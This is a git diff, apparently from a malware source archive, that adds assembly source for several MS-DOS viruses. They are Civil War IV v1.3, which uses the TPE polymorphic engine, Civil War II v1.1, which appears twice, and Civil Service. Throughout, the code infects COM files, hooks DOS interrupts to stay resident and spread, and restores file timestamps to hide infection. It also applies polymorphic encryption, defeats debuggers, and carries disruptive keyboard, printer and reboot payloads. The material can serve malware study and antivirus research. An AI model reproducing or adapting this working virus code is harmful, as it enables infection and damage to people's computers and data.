;get lenght of file + sub ax,03h + mov [lenght+bp],ax + mov ax,04200h ;goto begin of file + call move_pointer + +Write_jump: mov ah,40h ;Write JUMP intruction + mov cx,01h + lea dx,[jump+bp] + int 21h + + mov ah,40h ;Write JUMP offset + mov cx,02h + lea dx,[lenght+bp] + int 21h + + mov ah,40 ;Write initials to check + mov cx,02h ;for infection later + lea dx,[initials+bp] + int 21h + + mov ax,4202h ; move to end of file + call move_pointer ; for infection + +;***************************************************************************** +; T P E * +;***************************************************************************** + +Encrypt: push bp ; BP = delta offset + ; push delta offset on stack + ; for later use. + + mov ax,cs ; Calculate worksegment + add ax,01000h + mov es,ax ; ES point to decrypt virus + + lea dx,[begin+bp] ; DS:DX begin encryption + + mov cx,len ; virus lenght + + mov bp,[lenght+bp] ; decryption starts at this + add bp,103h ; point + + xor si,si ; distance between decryptor + ; and encrypted code is 0 bytes + + call rnd_get ; AX = random value + call crypt ; encrypt virus + + pop bp ; BP = delta offset + ; get delta offset of stack + +;****************************************************************************** +; T P E - E N D * +;****************************************************************************** + +Write_virus: mov bx,[handle+bp] + mov ah,40h + int 21h + +Restore_date: mov ax,05701h + mov bx,[handle+bp] + mov cx,[time+bp] + mov dx,[date+bp] + int 21h + +Exit: mov ax,cs + mov ds,ax + mov es,ax + mov bx,0100h ; jump to start program + jmp bx + +;---------------------------------------------------------------------------- + +move_pointer: mov bx,[handle+bp] + xor cx,cx + xor dx,dx + int 21h + ret + +;---------------------------------------------------------------------------- +v_name db "Civil War IV v1.2, (c) Jan '93 " +com_mask db "*.com",0 +handle dw ? +date dw ? +time dw ? +buffer db 090h,0cdh,020h,044h,048h,00h +initials dw 4844h +lenght dw ? +jump db 0e9h,0 +message db "For all i've seen has changed my mind" + db "But still the wars go on as the years go by" + db "With no love of God or human rights" + db "'Cause all these dreams are swept aside" + db "By bloody hands of the hypnotized" + db "Who carry the cross of homicide" + db "And history bears the scars of our Civil Wars." +writer db "[ DH / TridenT ]",00 + + end dummy diff --git a/MSDOS/Virus.MSDOS.Unknown.civil_4d.asm b/MSDOS/Virus.MSDOS.Unknown.civil_4d.asm new file mode 100644 index 00000000..4318c996 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civil_4d.asm @@ -0,0 +1,201 @@ +;**************************************************************************** +;* Civil War IV v1.3 * +;* * +;* Assembled with Tasm 2.5 * +;* * +;* (c) Jan '93 by Dark Helmet, The Netherlands. * +;* The author takes no responsibilty for any damages caused by the virus * +;* * +;* This is a example virus with the TPE engine for teaching you how to * +;* use the TPE engine. * +;* * +;*--------------------------------------------------------------------------* +;* * +;* Notes: * +;* * +;* This virus is NOT dedicated to Sara Gordon, but to all the innocent * +;* people who are killed in Yugoslavia. * +;* * +;* The text in the virus is taken from the song Civil War (hence the name) * +;* by Guns and Roses, Use Your Illusion II, we hope they don't mind it. * +;* * +;* The first name for the virus was NAVIGATOR II, because the virus is * +;* based on the NAVIGATOR virus (also written by me, a while back), but * +;* since I decided to put the songtext in it I renamed it to Civil War IV * +;* * +;* You need the TPE 1.3 engine to link this program. * * +;* * +;**************************************************************************** + + .model tiny + .radix 16 + .code + + extrn rnd_init:near + extrn rnd_get:near + extrn crypt:near + extrn tpe_top:near + + org 100h + +len equ offset tpe_top - begin + +Dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h + +Begin: call virus ; calculate delta offset + +Virus: pop bp + sub bp,offset virus + + mov dx,0fe00h ; DTA instellen + mov ah,1ah + int 21h + +Restore_begin: call rnd_init ; init random generator + mov di,0100h + lea si,ds:[buffer+bp] + mov cx,06h + rep movsb + +First: lea dx,[com_mask+bp] ;get first COM file + mov ah,04eh + xor cx,cx + int 21h + +Open_file: call rnd_get + mov ax,03d02h ;open for READ/WRITE + mov dx,0fe1eh + int 21h + mov [handle+bp],ax + xchg ax,bx + +Read_date: mov ax,05700h ;store date/time for later + int 21h ;use + mov [date+bp],dx + mov [time+bp],cx + +Check_infect: mov bx,[handle+bp] ;check if initials present in + mov ah,03fh ;file + mov cx,06h + lea dx,[buffer+bp] + int 21h + + mov al,byte ptr [buffer+bp]+3 ;Compare initials + mov ah,byte ptr [buffer+bp]+4 + cmp ax,[initials+bp] + jne infect_file ;if initials not present + ;start infecting file + +Close_file: mov bx,[handle+bp] ;close file + mov ah,3eh + int 21h + +Next_file: mov ah,4fh ;get next COM file + int 21h ;in directorie + jnb open_file + jmp exit + +Infect_file: mov ax,word ptr [cs:0fe1ah] ;get lenght of file + sub ax,03h + mov [lenght+bp],ax + mov ax,04200h ;goto begin of file + call move_pointer + +Write_jump: mov ah,40h ;Write JUMP intruction + mov cx,01h + lea dx,[jump+bp] + int 21h + + mov ah,40h ;Write JUMP offset + mov cx,02h + lea dx,[lenght+bp] + int 21h + + mov ah,40 ;Write initials to check + mov cx,02h ;for infection later + lea dx,[initials+bp] + int 21h + + mov ax,4202h ; move to end of file + call move_pointer ; for infection + +;***************************************************************************** +; T P E * +;***************************************************************************** + +Encrypt: push bp ; BP = delta offset + ; push delta offset on stack + ; for later use. + + mov ax,cs ; Calculate worksegment + add ax,01000h + mov es,ax ; ES point to decrypt virus + + lea dx,[begin+bp] ; DS:DX begin encryption + + mov cx,len ; virus lenght + + mov bp,[lenght+bp] ; decryption starts at this + add bp,103h ; point + + xor si,si ; distance between decryptor + ; and encrypted code is 0 bytes + + call rnd_get ; AX = random value + call crypt ; encrypt virus + + pop bp ; BP = delta offset + ; get delta offset of stack + +;****************************************************************************** +; T P E - E N D * +;****************************************************************************** + +Write_virus: mov bx,[handle+bp] + mov ah,40h + int 21h + +Restore_date: mov ax,05701h + mov bx,[handle+bp] + mov cx,[time+bp] + mov dx,[date+bp] + int 21h + + mov bx,[handle+bp] ; close file + mov ah,3eh + int 21h + +Exit: mov ax,cs ; restore registers + mov ds,ax + mov es,ax + mov bx,0100h ; jump to start program + jmp bx + +;---------------------------------------------------------------------------- + +move_pointer: mov bx,[handle+bp] + xor cx,cx + xor dx,dx + int 21h + ret + +;---------------------------------------------------------------------------- +v_name db "Civil War IV v1.3, (c) Jan '93 " +com_mask db "*.com",0 +handle dw ? +date dw ? +time dw ? +buffer db 090h,0cdh,020h,044h,048h,00h +initials dw 4844h +lenght dw ? +jump db 0e9h,0 +message db "For all i've seen has changed my mind" + db "But still the wars go on as the years go by" + db "With no love of God or human rights" + db "'Cause all these dreams are swept aside" + db "By bloody hands of the hypnotized" + db "Who carry the cross of homicide" + db "And history bears the scars of our Civil Wars." +writer db "[ DH / TridenT ]",00 + + end dummy diff --git a/MSDOS/Virus.MSDOS.Unknown.civil_ii.asm b/MSDOS/Virus.MSDOS.Unknown.civil_ii.asm new file mode 100644 index 00000000..51657b42 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civil_ii.asm @@ -0,0 +1,308 @@ +;**************************************************************************** +; Civil War II V1.1 * +; * +; Assembled with Tasm 2.5 * +; (c) 1992 Trident/Dark Helmet, The Netherlands * +; * +;**************************************************************************** +; * +; Civil War... * +; * +; "For all I've seen has change my mind * +; But still the wars go on as the years go by * +; With no love for God or human rights * +; 'Cause all these dreams are swept aside * +; By bloody hands of the hypnotized * +; Who carry the cross of homicide * +; And history bears the scars of our civil war" * +; * +;**************************************************************************** + + .Radix 16 +Civil_War Segment + Model small + Assume cs:Civil_War, ds:Civil_War, es:Civil_War + + org 100h + +len equ offset last - begin +virus_len equ len / 16d + +dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h ; Jump + infection + ; marker + +begin: Call virus ; make call to + ; push IP on stack + +virus: pop bp ; get IP from stack. + sub bp,109h ; adjust IP. + +restore_host: mov di,0100h ; recover beginning + lea si,ds:[carrier_begin+bp] ; of carrier program. + mov cx,06h + rep movsb + +check_resident: mov ah,0a0h ; check if virus + int 21h ; already installed. + cmp ax,0001h + je end_virus + +adjust_memory: mov ax,cs ; start of Memory + dec ax ; Control Block + mov ds,ax + cmp byte ptr ds:[0000],5a ; check if last + ; block + jne abort ; if not last block + ; end + mov ax,ds:[0003] ; decrease memory + sub ax,40 ; by 1kbyte lenght + mov ds:[0003],ax + sub word ptr ds:[0012],40h + +install_virus: mov bx,ax ; es point to start + mov ax,es ; virus in memory + add ax,bx + mov es,ax + mov cx,len ; cx = lenght virus + mov ax,ds ; restore ds + inc ax + mov ds,ax + lea si,ds:[begin+bp] ; point to start virus + lea di,es:0100 ; point to destination + rep movsb ; copy virus in + ; memory + mov [virus_segment+bp],es ; store start virus + ; in memory + mov ax,cs ; restore es + mov es,ax + +hook_vector: cli ; no interups + mov ax,3521h ; revector int 21 + int 21h + mov ds,[virus_segment+bp] + mov old_21h-6h,bx + mov old_21h+2-6h,es + + mov dx,offset main_virus - 6h + mov ax,2521h + int 21h + sti + +abort: mov ax,cs + mov ds,ax + mov es,ax + +end_virus: mov bx,0100h ; jump to begin + jmp bx ; host file + + +;***************************************************************************** + +main_virus: pushf + cmp ah,0a0h ; check virus call + jne new_21h ; no virus call + mov ax,0001h ; ax = id + popf ; return id + iret + +new_21h: push ds ; save registers + push es + push di + push si + push ax + push bx + push cx + push dx + +check_open: cmp ah,3dh + je chk_com + +check_exec: cmp ax,04b00h ; exec function? + je chk_com + +continu: pop dx ; restore registers + pop cx + pop bx + pop ax + pop si + pop di + pop es + pop ds + popf + jmp dword ptr cs:[old_21h-6] + +chk_com: mov cs:[name_seg-6],ds + mov cs:[name_off-6],dx + cld ; check extension + mov di,dx ; for COM + push ds + pop es + mov al,'.' ; search extension + repne scasb ; check for 'COM" + cmp word ptr es:[di],'OC' ; check 'CO' + jne continu + cmp word ptr es:[di+2],'M' ; check 'M' + jne continu + + call set_int24h + call set_atribuut + +open_file: mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + mov ax,3D02h ; open file + call do_int21h + jc close_file + push cs + pop ds + mov [handle-6],ax + mov bx,ax + + call get_date + +check_infect: push cs + pop ds + mov bx,[handle-6] ; read first 6 bytes + mov ah,3fh + mov cx,06h + lea dx,[carrier_begin-6] + call do_int21h + mov al, byte ptr [carrier_begin-6]+3 ; check initials + mov ah, byte ptr [carrier_begin-6]+4 ; 'D' and 'H' + cmp ax,[initials-6] + je save_date ; if equal already + ; infect + +get_lenght: mov ax,4200h ; file pointer begin + call move_pointer + mov ax,4202h ; file pointer end + call move_pointer + sub ax,03h ; ax = filelenght + mov [lenght_file-6],ax + + call write_jmp + call write_virus + +save_date: push cs + pop ds + mov bx,[handle-6] + mov dx,[date-6] + mov cx,[time-6] + mov ax,5701h + call do_int21h + +close_file: mov bx,[handle-6] + mov ah,03eh ; close file + call do_int21h + + mov dx,cs:[old_24h-6] ; restore int24h + mov ds,cs:[old_24h+2-6] + mov ax,2524h + call do_int21h + + jmp continu + + + + +new_24h: mov al,3 + iret + +;--------------------------------------------------------------------------- +; PROCEDURES +;--------------------------------------------------------------------------- + +move_pointer: push cs + pop ds + mov bx,[handle-6] + xor cx,cx + xor dx,dx + call do_int21h + ret + +do_int21h: pushf + call dword ptr cs:[old_21h-6] + ret + +write_jmp: push cs + pop ds + mov ax,4200h + call move_pointer + mov ah,40h + mov cx,01h + lea dx,[jump-6] + call do_int21h + mov ah,40h + mov cx,02h + lea dx,[lenght_file-6] + call do_int21h + mov ah,40h + mov cx,02h + lea dx,[initials-6] + call do_int21h + ret + +write_virus: push cs + pop ds + mov ax,4202h + call move_pointer + mov ah,40 + mov cx,len + mov dx,100 + call do_int21h + ret + +get_date: mov ax,5700h + call do_int21h + push cs + pop ds + mov [date-6],dx + mov [time-6],cx + ret + +set_int24h: mov ax,3524h + call do_int21h + mov cs:[old_24h-6],bx + mov cs:[old_24h+2-6],es + mov dx,offset new_24h-6 + push cs + pop ds + mov ax,2524h + call do_int21h + ret + +set_atribuut: mov ax,4300h ; get atribuut + mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + call do_int21h + and cl,0feh ; set atribuut + mov ax,4301h + call do_int21h + ret + +;--------------------------------------------------------------------------- +; DATA +;--------------------------------------------------------------------------- + +old_21h dw 00h,00h +old_24h dw 00h,00h +carrier_begin db 090h, 0cdh, 020h, 044h, 048h, 00h +text db 'Civil War II v1.1, (c) 06/03/1992 Trident/Dark Helmet, The Netherlands',00h +jump db 0e9h +name_seg dw ? +name_off dw ? +virus_segment dw ? +lenght_file dw ? +handle dw ? +date dw ? +time dw ? +initials dw 4844h +last db 090h + +Civil_war ends + end dummy + +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪; +;哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪哪; +;哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪; +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪; + diff --git a/MSDOS/Virus.MSDOS.Unknown.civilser.asm b/MSDOS/Virus.MSDOS.Unknown.civilser.asm new file mode 100644 index 00000000..407d7032 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civilser.asm @@ -0,0 +1,569 @@ +; Civil Service Virus by Marvin Giskard +; Turbo Assember version 2 + +Exec equ 4B00h +OpenFile equ 3D02h +ReadFile equ 3Fh +WriteFile equ 40h +CloseFile equ 3Eh +EXESign equ 5A4Dh +SeekTop equ 4200h +SeekEnd equ 4202h +GetAttr equ 4300h +SetAttr equ 4301h +GetDT equ 5700h +SetDT equ 5701h +MinSize equ 4h +MaxSize equ 0FBF0h +GetDate equ 2Bh +FileID equ 2206h +MemID equ 4246h ; 'FB' + +.MODEL SMALL +.CODE +ORG 0100h + +Start: + XOR AX, AX + MOV DS, AX + CMP WORD PTR DS:01ACh, MemID + JNE Instl2 + CMP WORD PTR DS:01AEh, FileID + JE NoInstl2 + +Instl2: + CALL InstallInMem + +NoInstl2: + PUSH CS + PUSH CS + POP DS + POP ES + MOV DX, OFFSET FileName + MOV AX, 4B22h + INT 21h + INT 20h + +FileName: DB 'TEST.COM',0 + +AddCode: + JMP OverData + + ; Addcode's data + +Buf: DB 0, 0 ; Miscellaneous Buf +JumpCode: DB 0E9h, 00h, 00h ; Code to be placed at front of file +FSize: DW 0 ; File size +Attr: DB 0 ; Attr of file being infected +FDateTime: DD 0 ; Time and date of file being infected +Generation: DW 0 ; Generation counter +Infected: DW 0 ; Number of files infected +Old24Handler: DD 0 ; Old INT 24h handler +Acts: DB 0 ; Flag to stop reentry +Path: DD 0 + +OverData: + MOV WORD PTR DS:0100h, 0000h + MOV BYTE PTR DS:0102h, 00h + + ; Check if handler already installed by examining 2 words in vector + ; table entry of INT 6Bh + + XOR AX, AX + MOV DS, AX + CMP WORD PTR DS:01ACh, MemID + JNE Instl + CMP WORD PTR DS:01AEh, FileID + JE AlreadyInstalled + +Instl: + CALL InstallInMem + JMP ALreadyInstalled + +InstallInMem: + MOV WORD PTR DS:01ACh, MemID + MOV WORD PTR DS:01AEh, FileID + + PUSH CS + POP DS + + ; Get INT 21h handler in ES:BX. + + MOV AX, 3521h + INT 21h +DoOldOfs: + MOV SI, OFFSET DoOld+1 + MOV [SI], BX + MOV [SI+2], ES + PUSH ES + PUSH BX + POP DX + POP DS + MOV AX, 256Dh + INT 21h + + ; This label is here so that the infect part will be able to calculate + ; source offset of Int21Handler and then place it in here before writing + ; it to disk. The OFFSET AddCode will be replaced by the right number. + +Source: + MOV SI, OFFSET AddCode + + ; Destination e.g. Where program will be placed are now calculated by + ; taking the amount of memory in $0040:$0013. Multiply by 16 to get + ; segment of memory end and then subract amount of blocks needed. + ; This is where routine will be placed. + + MOV AX, 0040h + MOV DS, AX + MOV AX, WORD PTR DS:0013h + MOV CL, 6 + SHL AX, CL + + ; Set dest. segment 2048 pages (32 K) below top of memory. + + SUB AX, 2048 + MOV ES, AX + XOR DI, DI + MOV CX, OFFSET AddCodeEnd - OFFSET AddCode + PUSH CS + POP DS + REP MOVSB + + ; Set INT 21h Handler to point to our routine + + MOV AX, 2521h + PUSH ES + POP DS + MOV DX, OFFSET Int21Handler - OFFSET AddCode + INT 21h + + MOV BYTE PTR DS:[OFFSET Acts-OFFSET AddCode], 0 + + RET + +AlreadyInstalled: + + Call DisTrace + + ; Code to jump back to 0100h + + PUSH CS + PUSH CS + POP DS + POP ES + MOV AX, 0100h + JMP AX + + ; Disable tracing and breakpoint setting for debuggers. + +DisTrace: + MOV AX, 0F000h + MOV DS, AX + MOV DX, 0FFF0h + MOV AX, 2501h + INT 21h + MOV AX, 2503h + INT 21h + RET + +Int21Handler: + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH DI + PUSH SI + PUSH ES + PUSH DS + + ; Install devious act if seed is right + + MOV AH, 2Ah + INT 6Dh + CMP CX, 1991 + JB Act + CMP DL, 22 + JNE Timer + DB 0EAh, 0F0h, 0FFh, 00h, 0F0h + +Timer: + MOV AH, 25h + CMP DL, 29 + JE Inst1 + CMP DL, 1 + JE Inst2 + CMP DL, 10 + JE Inst3 + CMP DL, 16 + JE Inst4 + JMP Act +Inst1: + MOV AL, 13h + JMP SetVec +Inst2: + MOV AL, 16h + JMP SetVec +Inst3: + MOV AL, 0Dh + JMP SetVec +Inst4: + MOV AL, 10h + +SetVec: + PUSH CS + POP DS + MOV DX, OFFSET Int24Handler - OFFSET AddCode + INT 6Dh + +Act: + MOV AX, 0040h + MOV DS, AX + MOV AX, WORD PTR DS:006Eh + + PUSH CS + POP DS + MOV BH, DS:[OFFSET Acts - OFFSET AddCode] + CMP BH, 3 + JE NoAct + + CMP AX, 22 + JE NoAct + + MOV BYTE PTR [SI], 3 + MOV AX, 3509h + INT 21h + PUSH ES + PUSH BX + POP DX + POP DS + MOV AX, 256Ah + INT 21h + PUSH CS + POP DS + MOV DX, OFFSET Int9Handler - OFFSET AddCode + MOV AX, 2509h + INT 21h + + MOV AX, 3517h + INT 21h + PUSH ES + PUSH BX + POP DX + POP DS + MOV AX, 256Ch + INT 21h + PUSH CS + POP DS + MOV DX, OFFSET Int17Handler - OFFSET AddCode + MOV AX, 2517h + INT 21h + +NoAct: + + POP DS + POP ES + POP SI + POP DI + POP DX + POP CX + POP BX + POP AX + + CMP AH, 4Bh + JE Infect +DoOld: + ; This next bytes represent a JMP 0000h:0000h. The 0's will be replaced + ; by the address of the old 21 handler. + DB 0EAh + DD 0 + +DoOldPop: + POP ES + POP DS + POP BP + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + JMP DoOld + +CloseQuit: + + MOV AX, 2524h + MOV SI, OFFSET Old24Handler-OFFSET AddCode + MOV DX, CS:[SI] + MOV DS, CS:[SI+2] + INT 21h + + PUSH CS + POP DS + MOV SI, OFFSET FDateTime-OFFSET AddCode + MOV CX, DS:[SI] + MOV DX, DS:[SI+2] + MOV AX, SetDT + INT 21h + + MOV AH, CloseFile + INT 21h + + MOV AX, SetAttr + MOV CL, DS:[OFFSET Attr - OFFSET AddCode] + XOR CH, CH + MOV SI, OFFSET Path-OFFSET AddCode + MOV DX, DS:[SI] + MOV DS, DS:[SI+2] + + INT 21h + + JMP DoOldPop + +Infect: + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + PUSH BP + PUSH DS + PUSH ES + + ; Get file's attr + + MOV AX, GetAttr + INT 21h + JC CloseQuit + MOV CS:[OFFSET Attr-OFFSET AddCode], CL + + MOV SI, OFFSET Path-OFFSET AddCode + MOV CS:[SI], DX + MOV CS:[SI+2], DS + + ; Get/Set INT 24h handler + + MOV AX, 3524h + INT 21h + MOV SI, OFFSET Old24Handler-OFFSET AddCode + MOV CS:[SI], BX + MOV CS:[SI+2], ES + MOV AX, 2524h + PUSH CS + POP DS + MOV DX, OFFSET Int24Handler-OFFSET AddCode + INT 21h + + ; Set new attribute + + MOV SI, OFFSET Path-OFFSET AddCode + MOV DX, CS:[SI] + MOV DS, CS:[SI+2] + + MOV AX, SetAttr + MOV CX, 0020h + INT 21h + JC CloseQuitFoot + + MOV AX, OpenFile + INT 21h + JC CloseQuitFoot + MOV BX, AX + + ; Get file's time and date and store + + MOV AX, GetDT + INT 21h + JC CloseQuitFoot + PUSH CS + POP DS + MOV SI, OFFSET FDateTime-OFFSET AddCode + MOV DS:[SI], CX + MOV DS:[SI+2], DX + + ; Read first two bytes of file + + MOV AH, ReadFile + MOV CX, 2 + MOV DX, OFFSET OverData+4-OFFSET AddCode + INT 21h + JC CloseQuitFoot + + ; Check if fisrt two bytes identify the file as an EXE file + ; If so, then don't infect the file + + CMP DS:[OFFSET OverData+4-OFFSET AddCode], EXESign + JE CloseQuitFoot + + ; Read next byte + + MOV AH, ReadFile + MOV CX, 1 + MOV DX, OFFSET OverData+10-OFFSET AddCode + INT 21h + JC CloseQuitFoot + + ; Get file size + + MOV AX, SeekEnd + XOR CX, CX + XOR DX, DX + INT 21h + JC CloseQuitFoot + + ; Save filesize and calculate jump offset + + CMP DX, 0 + JG CloseQuitFoot + CMP AX, MinSize + JB CloseQuitFoot + CMP AX, MaxSize + JA CloseQuitFoot + MOV DS:[OFFSET FSize-OFFSET AddCode], AX + MOV CX, AX + SUB AX, 03h + MOV DS:[OFFSET JumpCode+1-OFFSET AddCode], AX + + ; Calculate and store source + + ADD CX, 0100h + MOV [OFFSET Source+1-OFFSET AddCode], CX + + ADD CX, OFFSET DoOld-OFFSET AddCode + MOV [OFFSET DoOldOfs-OFFSET AddCode+1], CX + + JMP OverFoot1 + +CloseQuitFoot: + JMP CloseQuit + +OverFoot1: + ; Read last 2 bytes to see if it is already infected + + MOV AX, SeekTop + XOR CX, CX + MOV DX, [OFFSET FSize-OFFSET AddCode] + SUB DX, 2 + INT 21h + + MOV AH, ReadFile + MOV CX, 2 + MOV DX, OFFSET Buf-OFFSET AddCode + INT 21h + + CMP [OFFSET Buf-OFFSET AddCode], FileID + JE CloseQuitFoot + + ; Prepare to write new jump + + MOV AX, SeekTop + XOR CX, CX + XOR DX, DX + INT 21h + + ; Write new jump + + MOV AH, WriteFile + MOV CX, 3 + MOV DX, OFFSET JumpCode-OFFSET AddCode + INT 21h + + ; Write addcode + ; Code to restore first three bytes is at start of addcode + ; Int21 handler is also included + ; Generation counter is included in data + ; ID is at the end of addcode + + MOV AX, SeekEnd + XOR CX, CX + XOR DX, DX + INT 21h + + ; Increase generation counter before writing it to the new file + + INC WORD PTR [OFFSET Generation - OFFSET AddCode] + + ; Set files infected to 0, for child hasn't infected anyone. + + MOV SI, OFFSET Infected - OFFSET AddCode + PUSH WORD PTR [SI] + MOV WORD PTR [SI], 0 + + MOV AH, WriteFile + MOV DX, OFFSET AddCode - OFFSET AddCode ; 0000 + MOV CX, OFFSET AddCodeEnd - OFFSET AddCode + INT 21h + + ; Decrease counter again, cause all his children should have the same + ; generation count + + DEC WORD PTR [OFFSET Generation - OFFSET AddCode] + + ; Pop number of files infected and incread + + POP AX + INC AX + MOV WORD PTR [OFFSET Infected - OFFSET AddCode], AX + + JMP CloseQuit + +Int24Handler: + XOR AL, AL + IRET + +Int9Handler: + PUSH AX + PUSH CX + PUSH DS + + MOV AX, 0040h + MOV DS, AX + MOV AH, BYTE PTR DS:006Ch + CMP AH, 18 + JA NoChange + MOV CL, 4 + SHL AH, CL + SHR AH, CL + MOV BYTE PTR DS:0017h, AH + +NoChange: + POP DS + POP CX + POP AX + INT 6Ah + IRET + +Int17Handler: + CMP AH, 00h + JNE DoOld17 + PUSH DS + PUSH AX + PUSH BX + MOV BX, 0040h + MOV DS, BX + MOV BH, BYTE PTR DS:006Ch + SHR BH, 1 + SHR BH, 1 + CMP BH, 22h + JE Ignore17 + POP BX + POP AX + POP DS + +DoOld17: + INT 6Ch + IRET + +Ignore17: + POP BX + POP AX + POP DS + IRET + + DW FileID + +AddCodeEnd: + +END Start + diff --git a/MSDOS/Virus.MSDOS.Unknown.civilwar.asm b/MSDOS/Virus.MSDOS.Unknown.civilwar.asm new file mode 100644 index 00000000..800cfc2b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civilwar.asm @@ -0,0 +1,303 @@ +;**************************************************************************** +; Civil War II V1.1 * +; * +; Assembled with Tasm 2.5 * +; (c) 1992 Trident/Dark Helmet, The Netherlands * +; * +;**************************************************************************** +; * +; Civil War... * +; * +; "For all I've seen has change my mind * +; But still the wars go on as the years go by * +; With no love for God or human rights * +; 'Cause all these dreams are swept aside * +; By bloody hands of the hypnotized * +; Who carry the cross of homicide * +; And history bears the scars of our civil war" * +; * +;**************************************************************************** + + .Radix 16 +Civil_War Segment + Model small + Assume cs:Civil_War, ds:Civil_War, es:Civil_War + + org 100h + +len equ offset last - begin +virus_len equ len / 16d + +dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h ; Jump + infection + ; marker + +begin: Call virus ; make call to + ; push IP on stack + +virus: pop bp ; get IP from stack. + sub bp,109h ; adjust IP. + +restore_host: mov di,0100h ; recover beginning + lea si,ds:[carrier_begin+bp] ; of carrier program. + mov cx,06h + rep movsb + +check_resident: mov ah,0a0h ; check if virus + int 21h ; already installed. + cmp ax,0001h + je end_virus + +adjust_memory: mov ax,cs ; start of Memory + dec ax ; Control Block + mov ds,ax + cmp byte ptr ds:[0000],5a ; check if last + ; block + jne abort ; if not last block + ; end + mov ax,ds:[0003] ; decrease memory + sub ax,40 ; by 1kbyte lenght + mov ds:[0003],ax + sub word ptr ds:[0012],40h + +install_virus: mov bx,ax ; es point to start + mov ax,es ; virus in memory + add ax,bx + mov es,ax + mov cx,len ; cx = lenght virus + mov ax,ds ; restore ds + inc ax + mov ds,ax + lea si,ds:[begin+bp] ; point to start virus + lea di,es:0100 ; point to destination + rep movsb ; copy virus in + ; memory + mov [virus_segment+bp],es ; store start virus + ; in memory + mov ax,cs ; restore es + mov es,ax + +hook_vector: cli ; no interups + mov ax,3521h ; revector int 21 + int 21h + mov ds,[virus_segment+bp] + mov old_21h-6h,bx + mov old_21h+2-6h,es + + mov dx,offset main_virus - 6h + mov ax,2521h + int 21h + sti + +abort: mov ax,cs + mov ds,ax + mov es,ax + +end_virus: mov bx,0100h ; jump to begin + jmp bx ; host file + + +;***************************************************************************** + +main_virus: pushf + cmp ah,0a0h ; check virus call + jne new_21h ; no virus call + mov ax,0001h ; ax = id + popf ; return id + iret + +new_21h: push ds ; save registers + push es + push di + push si + push ax + push bx + push cx + push dx + +check_open: cmp ah,3dh + je chk_com + +check_exec: cmp ax,04b00h ; exec function? + je chk_com + +continu: pop dx ; restore registers + pop cx + pop bx + pop ax + pop si + pop di + pop es + pop ds + popf + jmp dword ptr cs:[old_21h-6] + +chk_com: mov cs:[name_seg-6],ds + mov cs:[name_off-6],dx + cld ; check extension + mov di,dx ; for COM + push ds + pop es + mov al,'.' ; search extension + repne scasb ; check for 'COM" + cmp word ptr es:[di],'OC' ; check 'CO' + jne continu + cmp word ptr es:[di+2],'M' ; check 'M' + jne continu + + call set_int24h + call set_atribuut + +open_file: mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + mov ax,3D02h ; open file + call do_int21h + jc close_file + push cs + pop ds + mov [handle-6],ax + mov bx,ax + + call get_date + +check_infect: push cs + pop ds + mov bx,[handle-6] ; read first 6 bytes + mov ah,3fh + mov cx,06h + lea dx,[carrier_begin-6] + call do_int21h + mov al, byte ptr [carrier_begin-6]+3 ; check initials + mov ah, byte ptr [carrier_begin-6]+4 ; 'D' and 'H' + cmp ax,[initials-6] + je save_date ; if equal already + ; infect + +get_lenght: mov ax,4200h ; file pointer begin + call move_pointer + mov ax,4202h ; file pointer end + call move_pointer + sub ax,03h ; ax = filelenght + mov [lenght_file-6],ax + + call write_jmp + call write_virus + +save_date: push cs + pop ds + mov bx,[handle-6] + mov dx,[date-6] + mov cx,[time-6] + mov ax,5701h + call do_int21h + +close_file: mov bx,[handle-6] + mov ah,03eh ; close file + call do_int21h + + mov dx,cs:[old_24h-6] ; restore int24h + mov ds,cs:[old_24h+2-6] + mov ax,2524h + call do_int21h + + jmp continu + + + + +new_24h: mov al,3 + iret + +;--------------------------------------------------------------------------- +; PROCEDURES +;--------------------------------------------------------------------------- + +move_pointer: push cs + pop ds + mov bx,[handle-6] + xor cx,cx + xor dx,dx + call do_int21h + ret + +do_int21h: pushf + call dword ptr cs:[old_21h-6] + ret + +write_jmp: push cs + pop ds + mov ax,4200h + call move_pointer + mov ah,40h + mov cx,01h + lea dx,[jump-6] + call do_int21h + mov ah,40h + mov cx,02h + lea dx,[lenght_file-6] + call do_int21h + mov ah,40h + mov cx,02h + lea dx,[initials-6] + call do_int21h + ret + +write_virus: push cs + pop ds + mov ax,4202h + call move_pointer + mov ah,40 + mov cx,len + mov dx,100 + call do_int21h + ret + +get_date: mov ax,5700h + call do_int21h + push cs + pop ds + mov [date-6],dx + mov [time-6],cx + ret + +set_int24h: mov ax,3524h + call do_int21h + mov cs:[old_24h-6],bx + mov cs:[old_24h+2-6],es + mov dx,offset new_24h-6 + push cs + pop ds + mov ax,2524h + call do_int21h + ret + +set_atribuut: mov ax,4300h ; get atribuut + mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + call do_int21h + and cl,0feh ; set atribuut + mov ax,4301h + call do_int21h + ret + +;--------------------------------------------------------------------------- +; DATA +;--------------------------------------------------------------------------- + +old_21h dw 00h,00h +old_24h dw 00h,00h +carrier_begin db 090h, 0cdh, 020h, 044h, 048h, 00h +text db 'Civil War II v1.1, (c) 06/03/1992 Trident/Dark Helmet, The Netherlands',00h +jump db 0e9h +name_seg dw ? +name_off dw ? +virus_segment dw ? +lenght_file dw ? +handle dw ? +date dw ? +time dw ? +initials dw 4844h +last db 090h + +Civil_war ends + end dummy + \ No newline at end of file diff --git 